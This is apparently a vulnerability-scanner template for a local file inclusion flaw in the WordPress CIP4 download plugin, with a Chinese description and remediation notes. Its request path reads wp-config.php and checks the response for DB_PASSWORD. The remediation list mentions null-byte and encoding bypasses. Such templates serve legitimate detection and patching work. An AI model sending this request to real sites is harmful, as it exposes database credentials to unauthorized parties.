id: Wordpress-CIP4-LFI
info:
  name: wordpress_CIP4_lfi
  author:
  - l0ne1y
  description: |-
    WordPress Plugin CIP4 本地文件包含漏洞
    WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一种应用插件。

    Wordpress Plugin CIP4 存在文件包含漏洞，该漏洞允许远程攻击者通过target参数和info参数实行文件包含攻击。
  severity: critical
  remediation: |-
    官方修复方案：
    1、建议用户到官方获取最新补丁或者最新版本程序：https://wordpress.org/plugins/CIP4

    临时修复方案：
    1、PHP 中使用 open_basedir 配置限制访问在指定的区域，路径长短截断
    2、过滤.（点）/（反斜杠）\\（反斜杠），编码绕过
    3、禁止服务器远程文件包含
    4、对于限制了包含文件后缀的情况，PHP版本小于5.3，php.ini magic_quotes_gpc = off，对可控参数未使用addslashes函数，满足这三个条件就可以使用%00截断。
    5、问号、井号、空格绕过（远程）
requests:
- matchers:
  - type: dsl
    dsl:
    - 'contains(body,"DB_PASSWORD") && status_code==200 '
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-content/plugins/cip4-folder-download-widget/cip4-download.php?target=wp-config.php&info=wp-config.php'
  method: GET
